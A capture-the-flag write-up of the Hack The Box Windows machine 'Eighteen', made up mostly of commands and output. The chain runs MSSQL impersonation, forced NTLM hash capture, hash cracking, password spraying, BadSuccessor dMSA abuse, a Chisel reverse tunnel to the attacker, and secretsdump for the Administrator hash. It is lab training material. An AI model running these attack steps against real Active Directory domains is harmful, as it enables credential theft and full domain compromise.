> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / WINDOWS / 2026-04-11

Hack The Box — Eighteen (Windows)

MSSQL impersonation and hash capture lead to web/admin and WinRM access, then BadSuccessor abuse with dMSA enables DCSync-style extraction of Administrator credentials.

Target

  • IP: 10.129.242.91

Machine information

As is common in real-life Windows penetration tests, you start the Eighteen box with credentials for the following account:

  • kevin / iNa2we6haRj2gaw!

Recon

sudo nmap -sC -sV 10.129.242.91 -p- -v

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.242.91:1433:
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-19T03:10:24+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-19T02:14:55
| Not valid after:  2055-11-19T02:14:55
| MD5:   1777:393a:b18b:b5ff:2edd:cf7f:fb32:2dac
|_SHA-1: 28fb:d268:6296:f936:5b0c:0d7c:c8dc:b2d3:85ec:5512
| ms-sql-info:
|   10.129.242.91:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Add dc01.eighteen.htb and eighteen.htb to /etc/hosts.

MSSQL access and privilege context

mssqlclient.py -port 1433 'EIGHTEEN'/'kevin':'iNa2we6haRj2gaw!'@dc01.eighteen.htb

We get an MSSQL shell.

enum_impersonate

execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------
b'LOGIN'     b''        IMPERSONATE       GRANT        kevin     appdev

exec_as_login appdev

enum_db

name                is_trustworthy_on
-----------------   -----------------
master                              0
tempdb                              0
model                               0
msdb                                1
financial_planner                   0

Capture MSSQL service hash

On the attacker machine:

sudo responder -I tun0

In the MSSQL shell:

EXEC master.sys.xp_dirtree '\\10.10.14.138\myshare',1, 1

We get:

[SMB] NTLMv2-SSP Client   : 10.129.242.91
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:ef133c02507f24bb:EFBA5AF6EBF801EEEC17DA60FBE4C593:0101000000000000001ECFF5C758DC01C0039D55ED92ECA8000000000200080039004B004200310001001E00570049004E002D00520042005A004C00460053004800510038004400560004003400570049004E002D00520042005A004C0046005300480051003800440056002E0039004B00420031002E004C004F00430041004C000300140039004B00420031002E004C004F00430041004C000500140039004B00420031002E004C004F00430041004C0007000800001ECFF5C758DC0106000400020000000800300030000000000000000000000000300000CDDEDD4BF7128F4E9B1C142D723985D03BDECBE37F0B2358EBA04D13FEA0E6050A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100330038000000000000000000

Put the hash into a file named hash.

hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt

It does not crack.

Database enumeration and web credential recovery

Back to the MSSQL shell:

use financial_planner

Enumerate tables:

SELECT name FROM financial_planner..sysobjects WHERE xtype='U'

users
incomes
expenses
allocations
analytics
visits

select * from users;

  id   full_name   username   email                password_hash                                                                                            is_admin   created_at
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03

We can use a Python script to convert the hash into a format understood by Hashcat. See the script convert_hash.py.

python3 convert_hash.py

We get:

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=

Put it into a file named hash.

./hashcat/hashcat -a 0 ./hash ./rockyou.txt

We get:

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

Go to http://eighteen.htb/. Go to the login page and sign in with:

  • admin:iloveyou1

WinRM access

Enumerate local users:

nxc mssql dc01.eighteen.htb -u 'kevin' -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute | cut -d: -f 2 | cut -d \\ -f2 | tail -n +3 > users.txt

nxc winrm dc01.eighteen.htb -u users.txt -p 'iloveyou1'

We get:

WINRM       10.129.242.91   5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

evil-winrm -i dc01.eighteen.htb -u 'adam.scott' -p 'iloveyou1'

We get a PowerShell shell.

(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *

CurrentBuild              : 26100
CurrentBuildNumber        : 26100
CurrentMajorVersionNumber : 10
CurrentMinorVersionNumber : 0
CurrentType               : Multiprocessor Free
CurrentVersion            : 6.3
DisplayVersion            : 24H2
EditionID                 : ServerDatacenter
InstallationType          : Server Core
InstallDate               : 1742787493
LCUVer                    : 10.0.26100.4349
ProductName               : Windows Server 2025 Datacenter
ReleaseId                 : 2009
UBR                       : 4349

AD ACL finding and BadSuccessor path

Upload PowerView.ps1 (https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1) to the victim machine.

. .\PowerView.ps1
Find-InterestingDomainACL

We notice:

ObjectDN                : OU=Staff,DC=eighteen,DC=htb
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : CreateChild
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-1152179935-589108180-1989892463-1604
IdentityReferenceName   : IT
IdentityReferenceDomain : eighteen.htb
IdentityReferenceDN     : CN=IT,OU=Staff,DC=eighteen,DC=htb
IdentityReferenceClass  : group

User adam.scott is part of the IT group. Searching online, we find that when there is CreateChild privilege on an OU in Windows Server 2025, the BadSuccessor exploit is possible.

Check whether it is exploitable. Use Get-BadSuccessorOUPermissions.ps1 from https://github.com/akamai/BadSuccessor. Upload it to the victim machine.

. .\Get-BadSuccessorOUPermissions.ps1
Get-BadSuccessorOUPermissions

Identity    OUs
--------    ---
EIGHTEEN\IT {OU=Staff,DC=eighteen,DC=htb}

User adam.scott is part of the IT group. It seems we can exploit this.

Useful article:

  • https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

Tooling attempts

I tried multiple tools to perform the exploit.

For example, there is a repository that automates the attack: https://github.com/logangoins/SharpSuccessor. It is a Visual Studio project. I compiled it on a Windows machine. Upload SharpSuccessor.exe to the victim machine.

.\SharpSuccessor.exe add /impersonate:Administrator /path:"OU=Staff,DC=eighteen,DC=htb" /account:adam_scott /name:attacker_dMSA

It does not work because it seems to require a machine account. We can create one like this:

$password = ConvertTo-SecureString "Summer2025!" -AsPlainText -Force
New-ADComputer -Name "attackersystem" -SamAccountName "attackersystem" -AccountPassword $password -Path "OU=Staff,DC=eighteen,DC=htb"

Then run SharpSuccessor.exe:

.\SharpSuccessor.exe add /impersonate:Administrator /path:"OU=Staff,DC=eighteen,DC=htb" /account:attackersystem$ /name:attacker_dMSA

[+] Adding dnshostname attacker_dMSA1.eighteen.htb
[+] Adding samaccountname attacker_dMSA1$
[+] Administrator's DN identified
[+] Attempting to write msDS-ManagedAccountPrecededByLink
[+] Wrote attribute successfully
[+] Attempting to write msDS-DelegatedMSAState attribute
[+] Attempting to set access rights on the dMSA object
[+] Attempting to write msDS-SupportedEncryptionTypes attribute
[+] Attempting to write userAccountControl attribute
[+] Created dMSA object 'CN=attacker_dMSA1' in 'OU=Staff,DC=eighteen,DC=htb'
[+] Successfully weaponized dMSA object
[+] Found target account, attempting to write attributes
[+] CN=attacker_dMSA1,OU=Staff,DC=eighteen,DC=htb written to Administrator object
[+] msDS-SupersededServiceAccountState set to 2
[!] Exception: Access is denied.

Unfortunately, it fails.

So I tried other tools. For example, I tried this BadSuccessor.exe build:

  • https://github.com/ibaiC/BadSuccessor/raw/refs/heads/main/BadSuccessor/obj/Debug/BadSuccessor.exe

Upload it to the victim machine.

.\BadSuccessor.exe find

[*] OUs you have write access to:
    -> OU=Domain Controllers,DC=eighteen,DC=htb
       Privileges: GenericWrite, GenericAll
    -> OU=Staff,DC=eighteen,DC=htb
       Privileges: GenericWrite, GenericAll, CreateChild

.\BadSuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=htb" -dmsa kreep_dmsa -targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" -dnshostname kreep_dmsa -user adam.scott -dc-ip 10.129.242.91

[*] Creating dMSA object...
[*] Inheriting target user privileges
    -> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
    -> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
    -> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute

[+] Created dMSA 'kreep_dmsa' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 10.129.242.91)

[*] Phase 4: Use Rubeus or Kerbeus BOF to retrieve TGS and Password Hash
    -> Step 1: Find luid of krbtgt ticket
     Rubeus:      .\Rubeus.exe triage
     Kerbeus BOF: krb_triage BOF

    -> Step 2: Get TGT of Windows 2025/24H2 system with a delegated MSA setup and migration finished.
     Rubeus:      .\Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
     Kerbeus BOF: krb_dump /luid:<luid>

    -> Step 3: Use ticket to get a TGS ( Requires Rubeus PR: https://github.com/GhostPack/Rubeus/pull/194 )
    Rubeus:      .\Rubeus.exe asktgs /ticket:TICKET_FROM_ABOVE /targetuser:kreep_dmsa$ /service:krbtgt/domain.local /dmsa /dc:<DC hostname> /opsec /nowrap

At this point it is very convenient to use Impacket instead of Rubeus.exe. I still included the Rubeus.exe procedure in additional notes.

Chisel SOCKS setup and Kerberos path

To access victim open ports from the attacker machine, use Chisel in SOCKS proxy mode. Download Chisel (https://github.com/jpillora/chisel) and upload the Windows binary to the victim machine.

On the attacker machine:

./chisel_linux server -p 9999 --reverse

On the victim machine:

.\chisel_windows.exe client 10.10.14.138:9999 R:socks

Now edit /etc/proxychains4.conf and set:

socks5  127.0.0.1 1080

Comment out any other SOCKS proxy lines.

Now, for example, we can access SMB:

proxychains nxc smb 10.129.242.91 -d eighteen.htb -u 'adam.scott' -p 'iloveyou1'

SMB         10.129.242.91   445    DC01             [+] eighteen.htb\adam.scott:iloveyou1

To synchronize time with the server, we must forward NTP port 123 over UDP.

.\chisel_windows.exe client 10.10.14.138:9999 R:123/udp

We can also combine it with SOCKS:

.\chisel_windows.exe client 10.10.14.138:9999 R:socks R:123/udp

Now run:

sudo ntpdate 127.0.0.1

getST dMSA flow and Administrator hash

Impacket getST.py has a dmsa option:

proxychains getST.py eighteen.htb/adam.scott:iloveyou1 -impersonate 'kreep_dmsa$' -dc-ip 10.129.242.91 -self -dmsa

[*] Saving ticket in kreep_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache

export KRB5CCNAME='kreep_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'

proxychains nxc smb 10.129.242.91 -d eighteen.htb -k --use-kcache

SMB         10.129.242.91     445    DC01             [+] eighteen.htb\kreep_dmsa$ from ccache (Pwn3d!)

At this point we can use secretsdump.py:

proxychains secretsdump.py -k -no-pass -just-dc-user Administrator 'eighteen.htb'/'kreep_dmsa$'@dc01.eighteen.htb

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec

evil-winrm -i 10.129.242.91 -u Administrator -H '0b133be956bfaddf9cea56701affddec'

We get a PowerShell shell as Administrator.

Additional notes

Note 1

Here is the Rubeus.exe procedure to complete the BadSuccessor exploit. Upload Rubeus.exe (https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/Rubeus.exe) to the victim machine.

.\Rubeus.exe asktgt /user:adam.scott /password:iloveyou1 /enctype:AES256 /outfile:ticket.kirbi

.\Rubeus.exe asktgs /ticket:ticket.kirbi /targetuser:kreep_dmsa$ /service:krbtgt/eighteen.htb /dmsa /dc:dc01.eighteen.htb /opsec /nowrap /outfile:tgs

We get a tgs file with the ticket.

.\Rubeus.exe asktgs /user:kreep_dmsa$ /service:cifs/dc01.eighteen.htb /opsec /dmsa /nowrap /ticket:tgs /outfile:tgs_final

Copy tgs_final to our machine. We can do this with smbserver:

smbserver.py -smb2support -username test12 -password test12 share $(pwd)

On the victim machine run:

net use \\10.10.14.138\share test12 /USER:test12
cp tgs_final \\10.10.16.119\share\

On our machine, convert the ticket:

ticketConverter.py tgs_final tgs_final.ccache

export KRB5CCNAME='tgs_final.ccache'

Now, with Chisel still active in SOCKS mode, run:

proxychains nxc smb 10.129.242.91 -d eighteen.htb -k --use-kcache

SMB         10.129.242.91     445    DC01             [+] eighteen.htb\kreep_dmsa$ from ccache (Pwn3d!)

And now we can use secretsdump.py:

proxychains secretsdump.py -k -no-pass -just-dc-user Administrator 'eighteen.htb'/'kreep_dmsa$'@dc01.eighteen.htb

Note 2

I tried several ways to perform the BadSuccessor exploit. One approach was taken directly from the article:

  • https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory
New-ADServiceAccount -Name "attacker_dMSA" -DNSHostName "dontcare.com" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword "adam.scott" -path "OU=Staff,DC=eighteen,DC=htb"

$dMSA = [ADSI]"LDAP://CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb"
$dMSA.Put("msDS-DelegatedMSAState", 2)
$dMSA.Put("msDS-ManagedAccountPrecededByLink", "CN=Administrator,CN=Users,DC=eighteen,DC=htb")
$dMSA.SetInfo()

However, an error occurs here. It seems we do not have permission to modify that Active Directory attribute.